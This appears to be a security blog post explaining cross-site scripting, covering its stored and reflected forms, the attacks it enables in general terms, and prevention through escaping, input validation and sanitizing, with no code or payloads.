There are numerous ways that a site’s security can be compromised. One possible method of attack is an injection attack (i.e. the attacker provides untrusted input to a program). The two most common types of injection attacks are: SQL injection (SQLi) and Cross-site Scripting (XSS) attacks. Today we will discuss the latter and how to protect your site from XSS vulnerabilities.
Cross-site Scripting is a type of computer security vulnerability which allows attackers to inject client-side scripts into web-pages viewed by other users. The attack is carried out when the victim actually visits the compromised web page. The malicious code inserted by the attacker is sent to the victim inside the page’s HTML file and is then executed by the browser. XSS vulnerabilities are most frequent in forums, message boards and websites that allow comments, however, are not limited to these styles of sites.
In fact, any web page or application that generates un-sanitized user input in its output is considered vulnerable. Certain incompetent website admins might say that since XSS is executed on the client-side, it is not the site’s problem. Despite their claims, their website acts as the delivery method of this malicious code, thus ignoring these vulnerabilities displays professional negligence. Cross-site scripting could also be used in order to deface a certain site by changing its content or redirecting to malicious pages, thus attacking the site directly, not only its users.
The ability to execute code in another user’s browser provides the attacker with the capability to execute the following types of attacks:
- Phishing: inserting fake login forms into sites, tricking other users to willingly hand over their sensitive information.
- Keylogging: using addEventListener the attacker can register all of the user’s keystrokes and forward the logs to his own server.
- Cookie theft: the attacker can retrieve the victims’ cookies associated with the website, thus retrieving sensitive information such as session ID and more.
Stored (a.k.a. Persistent) XSS:
These types of XXS attacks are carried out when the injected code is permanently stored on the target server. The victim then retrieves the script when he requests stored info.
Reflected (a.k.a. Non-Persistent) XSS:
Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website.
Likewise, there are 3 main ways to prevent XXS attacks:
Now this method is a must for any website. Escaping data means taking the data the application has received and making sure it’s secure before rendering it for the user. Basically, it is censoring certain symbols from being interpreted in a malicious way. Some good examples of it are: < and > symbols as the attackers could use them to inject malicious code.
This is not considered to be a primary XXS injection prevention method, however, should reduce the effects of an attack if a vulnerability is found. Validating input is the process of ensuring an application is rendering the correct data and preventing malicious data from doing harm to the site, database, and users. While whitelisting and input validation are more commonly associated with SQL injection, they can also be used as an additional method of prevention for XSS.
This method is an effective way to prevent cross-site scripting attacks, however, should not be used alone. There are many trusted filters online that you could use to sanitize user input. It is especially important in sites that allow HTML markup to guarantee that the received data can do no harm, changing unacceptable user input into a safe format.